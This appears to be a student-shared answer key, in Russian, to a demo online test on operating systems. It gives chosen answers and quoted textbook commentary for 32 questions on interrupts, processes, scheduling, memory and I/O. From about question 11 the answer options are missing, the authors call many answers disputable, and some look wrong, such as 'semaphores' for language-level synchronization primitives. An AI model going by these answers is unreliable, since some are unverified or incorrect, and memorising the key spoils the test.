Демонстрационный вариант
Ответы к части тестов можно найти путем ввода вопроса в любой поисковик.
Ссылка на тест в интернете (у кого не открывался файл с расширением xps): http://att.nica.ru/index.php?menu=structs_demo&submitaction=structsel&ootype=vuz&subj=159&speckod=230102.65
В некоторых вопросах ответ м.б. выделен курсивом - это вариант И.В.. Мои варианты выделены жирным красным шрифтом. Очень много спорных вопросов и ответов, тест – ужасный. Просьба на спорные вопросы заострить свое внимание, м.б. найдете более подходящую инф-ю. Можете готовиться только по моим ответам, а И.В. иметь ввиду.
Просим отнестись к нашему труду с пониманием, сами находимся не в лучшей ситуации.
ЗАДАНИЕ N 1( - выберите один вариант ответа)
Для сетевых операционных систем характерной является функция обеспечения …
ВАРИАНТЫ ОТВЕТОВ:
прямого доступа к оперативной памяти другого компьютера
Взаимодействия связанных между собой компьютеров
обмена сигналами между выполняющимися на разных компьютерах программами
программных каналов между разными компьютерами
ОТВЕТ: 2
Комментарий (ответ из учебника Гордеева.Глава 1. Основные понятия. Назначение и функции операционных систем):
“…основные функции операционных систем:
…
Для сетевых операционных систем характерной является функция обеспечения взаимодействия связанных между собой компьютеров...”
ЗАДАНИЕ N 2( - выберите один вариант ответа)
Одна операционная система может поддерживать несколько …
ВАРИАНТЫ ОТВЕТОВ:
микропрограммных сред
операционных систем
микропрограммных систем
Операционных сред
ОТВЕТ: 4
Комментарий (ответ из http://nofxsss2007.narod.ru/spo/10.htm):
Операционная среда - системное ПО, в котором могут выполняться программы, созданный по правилам этой среды.
Одна ОС может поддерживать несколько операционных сред. Примером может служить ОС Linux, в которой могут быть созданы условия для выполнения Windows - программ, и наоборот. Или же другой пример: ОС Windows, операционная среда которой может быть 16-ти и 32- битная. Приложения, созданные в 32-битной операционной среде не пойдут в 16-битной, а приложения, созданные в 16-битной пойдут в 32-битной среде.
Операционная среда определяется программным интерфейсом - API - Application Program Interface. API включает в себя управление процессами, памятью и вводом/выводом. Для каждой ОС свой API. Операционная среда может включать несколько интерфейсов, как пользовательских, так и программных:
графический интерфейс;
интерфейс командной строки.
ЗАДАНИЕ N 3( - выберите один вариант ответа)
Термин "маскирование" означает запрет отдельных …
ВАРИАНТЫ ОТВЕТОВ:
Сигналов прерывания
команд пользователя
процессов пользователя
команд процессора
ОТВЕТ: 1
Комментарий (ответ из учебника Гордеева.Глава 1. Основные понятия.Прерывания.):
Наличие сигнала прерывания не обязательно должно вызывать прерывание исполняющейся программы. Процессор может обладать средствами защиты от прерываний: отключение системы прерываний, маскирование (запрет) отдельных сигналов прерывания.
ЗАДАНИЕ N 4( - выберите один вариант ответа)
Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные …
ВАРИАНТЫ ОТВЕТОВ:
супервизорами
мониторами
маркерами
Семафорами
ОТВЕТ: 4
Комментарий (ответ из http://www.software.unn.ru/ccam/multicore/materials/os/MultiCore-OS-Lec4-Concurrency2.pdf):
Семафоры – примитивы синхронизации более высокого уровня абстракции, чем признаки блокировки; предложены Дийкстрой (Dijkstra) в 1968 г. в качестве компонента операционной системы THE
ЗАДАНИЕ N 5( - выберите один вариант ответа)
Относительный путь к файлу состоит из списка каталогов, которые нужно …
ВАРИАНТЫ ОТВЕТОВ:
Пройти от рабочего каталога, чтобы добраться до файла
открыть в корневом процессе, чтобы добраться до файла
добавить в переменную PATH операционной среды
пройти от корневого каталога, чтобы добраться до файла
ОТВЕТ: 1
Комментарий (ответ из http://www.uneex.ru/static/AltDocs_linux_intro/Filesystem_use.html):
Относительный путь начинается от текущего каталога, в то время как полный путь всегда начинается от корневого каталога.
p.s.: текущий каталог это и есть рабочий каталог или почитайте тут (инф-я из Вики: http://ru.wikipedia.org/wiki/%D0%E0%E1%EE%F7%E8%E9_%EA%E0%F2%E0%EB%EE%E3):
Рабочий каталог (англ. working directory, также текущий каталог или текущая директория) процесса — в информатике каталог файловой системы, который используется для нахождения файлов, указанных только по имени либо по относительному пути.
Текущий путь (англ. current path) — в терминологии файловых систем с каталогами, имя каталога, относительно которого производятся операции с относительными именами файлов (каталогов). Текущий путь обычно ассоциирован с процессом (у разных процессов может быть разный текущий путь).
ЗАДАНИЕ N 6( - выберите один вариант ответа)
Свопингом сегментов называется перемещение …
ВАРИАНТЫ ОТВЕТОВ:
1) |
блоков файла между каталогами файловой системы |
|
2) |
блоков данных между процессом и ядром операционной системы |
3) |
сегментов данных между стеком и оперативной памятью |
|
4) |
сегментов между оперативной и внешней памятью |
ОТВЕТ: 4
Комментарий (ответ из уч.пособия А.С.Деревянко, М.Н.Солощук Операционные системы Глава 3.Управление памятью 3.3. Односегментная модель)
http://khpi-iip.mipk.kharkiv.edu/library/spo/book/i_g03.html):
Перемещение сегментов и (см. ниже) страниц между оперативной и внешней памятью и наоборот называется свопингом (swapping), а составные его части - вытеснением (swap out) и подкачкой (swap in).
ЗАДАНИЕ N 7( - выберите один вариант ответа)
Идентификатор пользователя представляет собой уникальное _______ значение |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
ОТВЕТ: 4
Комментарий (ответ из http://www.netlib.narod.ru/library/book0010/ch07_04.htm):
Традиционно каждый процесс Unix имеет уникальный идентификатор — целое число в диапазоне от 0 до 32767, которое называется идентификатором процесса (process identifier, PID). Идентификаторы процессов PID 0 и 1 имеют для системы специальной значение; все остальные идентификаторы присваиваются «обычным» процессам.
ЗАДАНИЕ N 8 ( - выберите один вариант ответа) Мультитерминальный режим работы предполагает совмещение …
ВАРИАНТЫ ОТВЕТОВ:
1) |
привилегированного режима работы и режима пользователя |
|
2) |
многопроцессорного режима работы и режима ввода-вывода |
3) |
диалогового режима работы и режима мультипрограммирования |
|
4) |
аналогового режима работы и режима микропрограммирования |
ОТВЕТ: 3
Комментарий (ответ из учебника Гордеева.Глава 1. Основные понятия. Мультипрограммирование, многопользовательский режим работы и режим разделения времени):
Совмещение диалогового режима работы с компьютером и режима мультипрограммирования привело к появлению мулътитерминалъных, или многопользовательских, систем. Организовать параллельное выполнение нескольких задач можно разными способами (более подробно об этом см. в главе 2). Если это осуществляется таким образом, что на каждую задачу поочередно выделяется некий квант времени, после чего процессор передается другой задаче, готовой к продолжению вычислений, то такой режим принято называть режимом разделения времени (time sharing). Системы разделения времени активно развивались в 60-70 годы, и сам термин означал именно мультитерминальную и мультипрограммную систему.
ЗАДАНИЕ N 9( - выберите один вариант ответа)
Последовательная трансляция двух исходных программ является …
ВАРИАНТЫ ОТВЕТОВ:
1) |
одним последовательным процессом |
|
2) |
двумя одинаковыми процессами |
3) |
двумя разными процессами |
|
4) |
одной последовательной задачей |
ОТВЕТ: 3
Комментарий (ответ из ):
ЗАДАНИЕ N 10( - выберите один вариант ответа)
Идентификатор процесса является частью _____________ процесса.
ВАРИАНТЫ ОТВЕТОВ:
1) |
контекста |
|
2) |
типа |
3) |
дескриптора |
|
4) |
описателя |
ОТВЕТ: 3
Комментарий (ответ из http://www.opennet.ru/soft/proc/1.html):
Системные данные, используемые ядром для идентификации процесса, которые существуют в течение всего времени жизни процесса, образуют дескриптор (описатель) процесса. Множество дескрипторов образуют таблицу процессов. Размер таблицы процессов, хотя и имеет допустимые ограничения, но в современных версиях UNIX позволяет создавать до нескольких сотен процессов. Дескриптор процесса содержит его параметры. Информация о состоянии включает расположение (адрес в памяти), размер выгружаемой части образа процесса, идентификаторы процесса и запустившего его пользователя.
ЗАДАНИЕ N 11 ( - выберите один вариант ответа) В OS UNIX каждый новый процесс может быть образован (порожден) только … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
ОТВЕТ: 4 Комментарий (ответ из http://technomag.edu.ru/doc/48678.html (ВНУТРЕННЕЕ УСТРОЙСТВО OS UNIX автор: Родионов С.)): Множество процессов, существующих в каждый момент, образуют единую иерархическую структуру, где они связаны отношениями потомок-предок. Каждый новый процесс может быть образован (порожден) только одним из существующих процессов, который становится его предком. По отношению к предку порожденый процесс будет считаться потомком. Иного способа образования новых процессов и иных отношений между процессами в OS UNIX не предусмотрено. Следует отметить, что любой процесс-предок может иметь более одного потомка. |
||||||||||
|
||||||||||
ЗАДАНИЕ N 12 ( - выберите один вариант ответа) Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 4 Комментарий (ответ из учебника Гордеева Глава 2.Управление задачами ): Основное различие между долгосрочным и краткосрочным планировщиками заключается в частоте их запуска, например: краткосрочный планировщик может запускаться каждые 30 или 100 мс, долгосрочный — один раз в несколько минут (или чаще; тут многое зависит от общей длительности решения заданий пользователей). Долгосрочный планировщик решает, какой из процессов, находящихся во входной очереди, в случае освобождения ресурсов памяти должен быть переведен в очередь процессов, готовых к выполнению. Долгосрочный планировщик выбирает процесс из входной очереди с целью создания неоднородной мультипрограммной смеси. Это означает, что в очереди готовых к выполнению процессов должны находиться в разной пропорции как процессы, ориентированные на ввод-вывод, так и процессы, ориентированные преимущественно на активное использование центрального процессора. Краткосрочный планировщик решает, какая из задач, находящихся в очереди готовых к выполнению, должна быть передана на исполнение. В большинстве современных операционных систем, с которыми мы сталкиваемся, долгосрочный планировщик отсутствует.
|
ЗАДАНИЕ N 13 ( - выберите один вариант ответа) Приоритет, меняющийся во время исполнения процесса, называется _____________ приоритетом. |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 4 Комментарий (ответ из http://www.netlib.narod.ru/library/book0010/ch07_03.html (книга Ядро Linux в комментариях автор: Скотт Максвелл)): Процессы не реального времени имеют два различных вида приоритетов: статический приоритет и динамический приоритет. Процессы реального времени добавляют третий вид приоритета — приоритет реального времени. Приоритеты — это просто целочисленные значения, выражающие относительный вес, который должен быть присвоен процессу при определении того, какому процессу должно быть выделено определенное время центрального процессора. Чем выше приоритет процесса, тем выше его шансы получить доступ к процессору.
|
||||||||||
ЗАДАНИЕ N 14 ( - выберите один вариант ответа) При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из http://elforcer.ucoz.ru/forum/4-518-1): Существует достаточно обширный класс средств операционной системы, с помощью которых обеспечивается взаимная синхронизация процессов и потоков. Потребность в синхронизации потоков возникает только в мультипрограммной операционной системе и связана с совместным использованием аппаратных и информационных ресурс об вычислительной системы. Синхронизация необходима для исключения гонок и тупиков при обмене данными между потоками, разделении данных, при доступе к процессору и устройствам ввода-вывода.
|
ЗАДАНИЕ N 15 ( - выберите один вариант ответа) В операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 1 Комментарий (ответ из http://library.tuit.uz/lectures/it/Operatsionniye_sistemi.htm): Если рассматривать выполнение процесса на виртуальном компьютере, который предоставляется каждому пользователю, то в такой системе должна существовать система прерываний, отвечающая стандартным требованиям:
Всем этим требованиям в UNIX отвечает механизм сигналов, который позволяет не только воспринимать и обрабатывать сигналы, но и порождать их и посылать на другие машины (процессы). Сигналы могут быть синхронными, когда инициатор сигнала — сам процесс, и асинхронными, когда инициатор сигнала — интерактивный пользователь, сидящий за терминалом. Источником асинхронных сигналов может быть также ядро, когда оно контролирует определенные состояния аппаратуры, рассматриваемые как ошибочные. Сигналы можно рассматривать как простейшую форму взаимодействия между процессами. Они используются для передачи от одного процесса другому или от ядра ОС какому-либо процессу уведомления о возникновении определенного события.
|
||||||||||
ЗАДАНИЕ N 16 ( - выберите несколько вариантов ответа) Область эффективного применения событийного программирования начинается там, где возникают … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 4 и д.б. еще какой-то Комментарий (ответ из книги Непейвода H.H., Скопин И.Н. Основания программирования http://www.oraclub.ru/bookinfo-nepeyvoda-nn/nepeyvoda-nn-programmirovanie-razdel-1.html?start=116): Область эффективного применения событийного стиля программирования начинается именно там, где становится неудобным использовать граф перехода между состояниями. Стиль событийного программирования — это создание для каждого события собственной процедуры обработчика. Порядок, в котором обработчики описываются в программе, не имеет никакого значения. Более того, они могут, а во многих случаях и должны быть приписаны к разным структурным единицам программы, в рамках которых только и осмыслена реакция на событие. Как следствие, продуктивно разбивать реакцию на событие на части, за которые отвечают такие структурные единицы, и иметь несколько реакций (разных) структурных единиц на одно событие.
|
ЗАДАНИЕ N 17 ( - выберите один вариант ответа) Два параллельных процесса могут быть … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из http://e-book.narod.ru/text/tr21.htm):
Последовательные процессы, исполнение которых хотя бы частично перекрывается по времени, являются параллельными. Два параллельных процесса могут быть независимыми либо взаимодействующими. Независимыми являются процессы, которые работают на независимых множествах переменных. На результат исполнения такого процесса не влияет работа независимого от него процесса, так как последний никак не может изменить значения переменных первого. Взаимодействующие процессы совместно используют переменные, и выполнение одного влияет на результат другого. “Переменные” в этом контексте требуют более широкой интерпретации; к ним могут относиться файлы данных, а также ячейки оперативной памяти, сопоставленные переменным программы на исходном языке.
|
||||||||||
ЗАДАНИЕ N 18 ( - выберите один вариант ответа) Главной целью мультипрограммирования в системах пакетной обработки является … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из http://www.rus-lib.ru/book/28/prog/10/087-161.htm): Мультипрограммирование, или многозадачность (multitasking) — это способ организации вычислительного процесса, при котором на одном процессоре попеременно выполняются сразу несколько программ. Эти программы совместно используют не только процессор, но и другие ресурсы компьютера, оперативную и внешнюю память, устройства ввода-вывода, данные. Мультипрограммирование призвано повысить эффективность использования вычислительной системы, однако эффективность может пониматься по-разному. Наиболее характерными критериями эффективности вычислительных систем являются: · пропускная способность — количество задач, выполняемых вычислительной системой в единицу времени; · удобство работы пользователей, заключающееся, в частности, в том, что они имеют возможность интерактивно работать одновременно с несколькими приложениями на одной машине; · реактивность системы — способность системы выдерживать заранее заданные (возможно, очень короткие) интервалы времени между запуском программы и получением результата. В зависимости от выбранного критерия эффективности ОС делятся на системы пакетной обработки, системы разделения времени и системы реального времени. Каждый тип ОС имеет специфические внутренние механизмы и особые области применения. Некоторые операционные системы могут поддерживать одновременно несколько режимов, например часть задач может выполняться в режиме пакетной обработки, а часть — в режиме реального времени или в режиме разделения времени. Мультипрограммирование в системах пакетной обработки При использовании мультипрограммирования для повышения пропускной способности компьютера главной целью является минимизация простоев всех устройств компьютера, и прежде всего центрального процессора. Такие простои могут возникать из-за приостановки задачи по ее внутренним причинам, связанным, например, с ожиданием ввода данных для обработки. Данные могут храниться на диске или же поступать от пользователя, работающего за терминалом, а также от измерительной аппаратуры, установленной на внешних технических объектах. При возникновении такого рода блокировки выполняемой задачи естественным решением, ведущим к повышению эффективности использования процессора, является переключение процессора на выполнение другой задачи, у которой есть данные для обработки. Такая концепция мультипрограммирования положена в основу так называемых пакетных систем. Мультипрограммирование в системах разделения времени В системах разделения времени пользователям (или одному пользователю) предоставляется возможность интерактивной работы сразу с несколькими приложениями. Для этого каждое приложение должно регулярно получать возможность «общения» с пользователем. Понятно, что в пакетных системах возможности диалога пользователя с приложением весьма ограничены…. …критерием эффективности систем разделения времени является не максимальная пропускная способность, а удобство и эффективность работы пользователя. Вместе с тем мультипрограммное выполнение интерактивных приложений повышает и пропускную способность компьютера (пусть и не в такой степени, как пакетные системы). Аппаратура загружается лучше, поскольку в то время, пока одно приложение ждет сообщения пользователя, другие приложения могут обрабатываться процессором. Мультипрограммирование в системах реального времени Еще одна разновидность мультипрограммирования используется в системах реального времени, предназначенных для управления от компьютера различными техническими объектами (например, станком, спутником, научной экспериментальной установкой и т. д.) или технологическими процессами (например, гальванической линией, доменным процессом и т. п.). Во всех этих случаях существует предельно допустимое время, в течение которого должна быть выполнена та или иная управляющая объектом программа. В противном случае может произойти авария: спутник выйдет из зоны видимости, экспериментальные данные, поступающие с датчиков, будут потеряны, толщина гальванического покрытия не будет соответствовать норме. Таким образом, критерием эффективности здесь является способность выдерживать заранее заданные интервалы времени между запуском программы и получением результата (управляющего воздействия). Это время называется временем реакции системы, а соответствующее свойство системы — реактивностью. Требования ко времени реакции зависят от специфики управляемого процесса. Контроллер робота может требовать от встроенного компьютера ответ в течение менее 1 мс, в то время как при моделировании полета может быть приемлем ответ в 40 мс. В системах реального времени мультипрограммная смесь представляет собой фиксированный набор заранее разработанных программ, а выбор программы на выполнение осуществляется по прерываниям (исходя из текущего состояния объекта) или в соответствии с расписанием плановых работ (более подробное описание темы - см. ссылку в начале комментария).
|
ЗАДАНИЕ N 19 ( - выберите один вариант ответа) Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
|
||||||||||
ЗАДАНИЕ N 20 ( - выберите один вариант ответа) Использование виртуальной памяти в однопрограммном режиме приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 1 Комментарий (ответ из http://isit.hut.ru/evm/3.html): В однопрограммном режиме единственная программа загружается в основную память компьютера, после чего она выполняется до конца или до получения команды на прекращение счета. В однопрограммном режиме в любой момент времени работает только одно устройство компьютера – процессор или периферийное оборудование, а остальные простаивают в ожидании окончания предшествующего этапа обработки. Т.о., однопрограммный режим характеризуется низким коэффициентом загрузки оборудования. В результате этого производительность компьютера оказывается невысокой и медленно растет с увеличение быстродействия процесса. Поэтому однопрограммный режим работы приводит к большим потерям эффективности из-за недоиспользования устройств, входящих в вычислительный комплекс.
http://www.studarhiv.ru/dir/cat32/subj120/file1237/view1237.html Размер программ в обычном случае ограничивается емкостью имеющейся основной памяти
|
ЗАДАНИЕ N 21 ( - выберите несколько вариантов ответа) Виртуальная память позволяет … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2,3 Комментарий (ответ из http://sergeev.sebastopol.ua/ostema08.html): Виртуальная память
Особенности виртуальной памяти
|
||||||||||
ЗАДАНИЕ N 22 ( - выберите один вариант ответа) Сегментная организация памяти … отдельно скомпилированных процедур. |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из http://www.intuit.ru/department/os/modernos/class/free/6/5.html): …Помимо простоты управления увеличивающимися или сокращающимися структурами данных, сегментированная память обладает и другими преимуществами. К ним относятся:
|
Ответы с 23-26 взяты из файла И.В. (их не успела проверить):
ЗАДАНИЕ N 23 ( - выберите один вариант ответа) При страничной организации памяти таблица страниц может размещаться в … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из http://vv303.narod.ru/files/inst/olifer/chapter5/default.htm)
Из файла Изольды Валерьевны: Размер страницы влияет также на количество записей в таблицах страниц. Чем меньше страница, тем более объемными являются таблицы страниц процессов и тем больше места они занимают в памяти. Учитывая, что в современных процессорах максимальный объем виртуального адресного пространства процесса, как правило, не меньше 4 Гбайт (232), то при размере страницы 4 Кбайт (212) и длине записи 4 байта для хранения таблицы страниц может потребоваться 4 Мбайт памяти! Выходом в такой ситуации является хранение в памяти только той части таблицы страниц, которая активно используется в данный период времени — так как сама таблица страниц хранится в таких же страницах физической памяти, что и описываемые ею страницы, то принципиально возможно временно вытеснять часть таблицы страниц из оперативной памяти.
|
||||||||||
ЗАДАНИЕ N 24 ( - выберите один вариант ответа) Страничная организация предназначена для … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ : 1 Сегментно-страничная и страничная организация памяти позволяет легко организовать совместное использование одних и тех же данных и программного кода разными задачами.
|
ЗАДАНИЕ N 25 ( - выберите один вариант ответа) При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ : 2 После того, как выбрана страница, которая должна покинуть оперативную память, анализируется ее признак модификации (из таблицы страниц). Если выталкиваемая страница с момента загрузки была модифицирована, то ее новая версия должна быть переписана на диск. Если нет, то она может быть просто уничтожена, то есть соответствующая физическая страница объявляется свободной.
|
||||||||||
ЗАДАНИЕ N 26 ( - выберите один вариант ответа) Полная реализация алгоритма LRU (Least Recently Used) … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ : 2 Основная проблема least recently used (LRU) - реализация. Необходимо иметь связанный список всех страниц в памяти, в начале которого будут часто используемые страницы. Причем он должен обновляться при каждой ссылке. Много времени нужно на поиск страниц в списке. Есть вариант реализации со специальным устройством. Например, - иметь 64-битный указатель, который автоматически увеличивается на 1 после каждой инструкции и в таблице страниц иметь соответствующее поле, в которое заносится значение указателя при каждой ссылке на страницу. При возникновении page fault'а выгружается страница с наименьшим указателем. Как оптимальный алгоритм, так и LRU не страдают от аномалии Белейди (определенные последовательности обращений к страницам приводят в действительности к увеличению числа страничных нарушений при увеличении кадров, выделенных процессу). Существует класс алгоритмов, называемых стековыми (stack) алгоритмами, которые не проявляют аномалии Белейди.
|
ЗАДАНИЕ N 27 ( - выберите один вариант ответа) Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывода. |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 3 Комментарий (ответ из книги Гордеева http://tid.com.ua/tid1/addonres.php?id=4729 или см.материал к 4-й теме для подготовки к тесту): управление вводом-выводом осуществляется компонентом операционной системы, который часто называют супервизором ввода-вывода.
|
||||||||||
ЗАДАНИЕ N 28 ( - выберите один вариант ответа) Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывода. |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий Источник 1. ответ из.материала к 4-й теме для подготовки к тесту: Блочные и символьные устройства Типичный пример блочного устройства(или блок-ориентированного) – устройство управления дисками. Оно выполняет команды вида: read, write, seek (считать, записать или найти блок с заданным номером). Устройство может выполнять чистый ввод-вывод или доступ к файловой системе. Имеется возможность доступа к файлу, отображаемому в память. Типичные примеры символьных устройств (иногда называют байт-ориентированными) – клавиатура, мышь, последовательные порты. Такие устройства выполняют команды вида: get, put (считать или записать символ). Библиотеки верхнего уровня в операционной системе для символьных устройств допускают построчное редактирование посимвольно введенной информации.
Источник 2: http://citforum.ru/operating_systems/sos/glava_9.shtml#_2_4 Физическая организация устройств ввода-вывода Устройства ввода-вывода делятся на два типа: блок-ориентированные устройства(или блочные) и байт-ориентированные(или символьные) устройства. Блок-ориентированные устройства хранят информацию в блоках фиксированного размера, каждый из которых имеет свой собственный адрес. Самое распространенное блок-ориентированное устройство - диск. Байт-ориентированные устройства не адресуемы и не позволяют производить операцию поиска, они генерируют или потребляют последовательность байтов. Примерами являются терминалы, строчные принтеры, сетевые адаптеры. Однако некоторые внешние устройства не относятся ни к одному классу, например, часы, которые, с одной стороны, не адресуемы, а с другой стороны, не порождают потока байтов. Это устройство только выдает сигнал прерывания в некоторые моменты времени. Внешнее устройство обычно состоит из механического и электронного компонента. Электронный компонент называется контроллером устройства или адаптером. Механический компонент представляет собственно устройство. Некоторые контроллеры могут управлять несколькими устройствами. Если интерфейс между контроллером и устройством стандартизован, то независимые производители могут выпускать совместимые как контроллеры, так и устройства. Операционная система обычно имеет дело не с устройством, а с контроллером. Контроллер, как правило, выполняет простые функции, например, преобразует поток бит в блоки, состоящие из байт, и осуществляют контроль и исправление ошибок. Каждый контроллер имеет несколько регистров, которые используются для взаимодействия с центральным процессором. В некоторых компьютерах эти регистры являются частью физического адресного пространства. В таких компьютерах нет специальных операций ввода-вывода. В других компьютерах адреса регистров ввода-вывода, называемых часто портами, образуют собственное адресное пространство за счет введения специальных операций ввода-вывода (например, команд IN и OUT в процессорах i86). ОС выполняет ввод-вывод, записывая команды в регистры контроллера. Например, контроллер гибкого диска IBM PC принимает 15 команд, таких как READ, WRITE, SEEK, FORMAT и т.д. Когда команда принята, процессор оставляет контроллер и занимается другой работой. При завершении команды контроллер организует прерывание для того, чтобы передать управление процессором операционной системе, которая должна проверить результаты операции. Процессор получает результаты и статус устройства, читая информацию из регистров контроллера.
|
ЗАДАНИЕ N 29 ( - выберите один вариант ответа) Любые операции по управлению вводом-выводом объявляются … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 1 Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту): …самым главным является следующий принцип: любые операции по управлению вводом-выводом объявляются привилегированными и могут выполняться только кодом самой операционной системы. Для обеспечения этого принципа в большинстве процессоров даже вводятся режимы пользователя и супервизора. Последний еще называют привилегированным режимом, или режимом ядра. Как правило, в режиме супервизора выполнение команд ввода-вывода разрешено, а в пользовательском режиме — запрещено.
|
||||||||||
ЗАДАНИЕ N 30 ( - выберите один вариант ответа) Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):
Перечислим основные задачи, возлагаемые на супервизор.
В случае, если устройство ввода-вывода является инициативным2, управление со стороны супервизора ввода-вывода будет заключаться в активизации соответствующего вычислительного процесса (перевод его в состояние готовности к выполнению).
|
ЗАДАНИЕ N 31 ( - выберите один вариант ответа) В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессора. |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 3 Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту): …имеется два основных режима ввода-вывода:
1. режим обмена с опросом готовности устройства ввода-вывода. Пусть для простоты рассмотрения этих вопросов управление вводом-выводом осуществляет центральный процессор. В этом случае часто говорят о работе программного канала обмена данными между внешними устройством и оперативной памятью (в отличие от канала прямого доступа к памяти, при котором управление вводом-выводом осуществляет специальное дополнительное оборудование). Итак, пусть центральный процессор посылает команду устройству управления, требующую, чтобы устройство ввода-вывода выполнило некоторое действие. Например, если мы управляем дисководом, то это может быть команда на включение двигателя или команда, связанная с позиционированием магнитных головок. Устройство управления исполняет команду, транслируя сигналы, понятные ему и центральному устройству, в сигналы, понятные устройству ввода-вывода. После выполнения команды устройство ввода-вывода (или его устройство управления) выдает сигнал готовности, который сообщает процессору о том, что можно выдать новую команду для продолжения обмена данными. Однако поскольку быстродействие устройства ввода-вывода намного меньше быстродействия центрального процессора (порой на несколько порядков), то сигнал готовности приходится очень долго ожидать, постоянно опрашивая соответствующую линию интерфейса на наличие или отсутствие нужного сигнала. Посылать новую команду, не дождавшись сигнала готовности, сообщающего об исполнении предыдущей команды, бессмысленно. В режиме опроса готовности драйвер, управляющий процессом обмена данными с внешним устройством, как раз и выполняет в цикле команду «проверить наличие сигнала готовности». До тех пор пока сигнал готовности не появится, драйвер ничего другого не делает. При этом, естественно, нерационально используется время центрального процессора.
2. режим обмена с прерываниями. Гораздо выгоднее, выдав команду ввода-вывода, на время забыть об устройстве ввода-вывода и перейти на выполнение другой программы. А появление сигнала готовности трактовать как запрос на прерывание от устройства ввода-вывода. Именно эти сигналы готовности и являются сигналами запроса на прерывание. Режим обмена с прерываниями по своей сути является режимом асинхронного управления. Для того чтобы не потерять связь с устройством (после выдачи процессором очередной команды по управлению обменом данными и переключения его на выполнение других программ), может быть запущен отсчет времени, в течение которого устройство обязательно должно выполнить команду и выдать-таки сигнал запроса на прерывание. Максимальный интервал времени, в течение которого устройство ввода-вывода или его контроллер должны выдать сигнал запроса на прерывание, часто называют установкой тайм-аута. Если это время истекло после выдачи устройству очередной команды, а устройство так и не ответило, то делается вывод о том, что связь с устройством потеряна и управлять им больше нет возможности. Пользователь и/или задача получают соответствующее диагностическое сообщение.
|
||||||||||
ЗАДАНИЕ N 32 ( - выберите один вариант ответа) Понятия «виртуального устройства» по отношению к понятию «спулинга» … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):
Как известно, многие устройства и, прежде всего, устройства с последовательным доступом не допускают совместного использования. Такие устройства могут стать закрепленными за процессом, то есть их можно предоставить некоторому вычислительному процессу на все время жизни этого процесса. Однако это приводит к тому, что вычислительные процессы часто не могут выполняться параллельно — они ожидают освобождения устройств ввода-вывода. Чтобы организовать совместное использование многими параллельно выполняющимися задачами тех устройств ввода-вывода, которые не могут быть разделяемыми, вводится понятие виртуальных устройств. Принцип виртуализации позволяет повысить эффективность вычислительной системы. Вообще говоря, понятие виртуального устройства шире, нежели понятие спулинга (spooling — Simultaneous Peripheral Operation On-Line, то есть имитация работы с устройством в режиме непосредственного подключения к нему). Основное назначение спулинга — создать видимость разделения устройства ввода-вывода, которое фактически является устройством с последовательным доступом и должно использоваться только монопольно и быть закрепленным за процессом. Например, мы уже говорили, что в случае, когда несколько приложений должны выводить на печать результаты своей работы, если разрешить каждому такому приложению печатать строку по первому же требованию, то это приведет к потоку строк, не представляющих никакой ценности. Однако если каждому вычислительному процессу предоставлять не реальный, а виртуальный принтер, и поток выводимых символов (или управляющих кодов для их печати) сначала направлять в специальный файл на диске (так называемый спул-файл — spool-file) и только потом, по окончании виртуальной печати, в соответствии с принятой дисциплиной обслуживания и приоритетами приложений выводить содержимое спул-файла на принтер, то все результаты работы можно будет легко читать. Системные процессы, которые управляют спул-файлом, называются спулером чтения (spool-reader) или спулером записи (spool-writer).
|
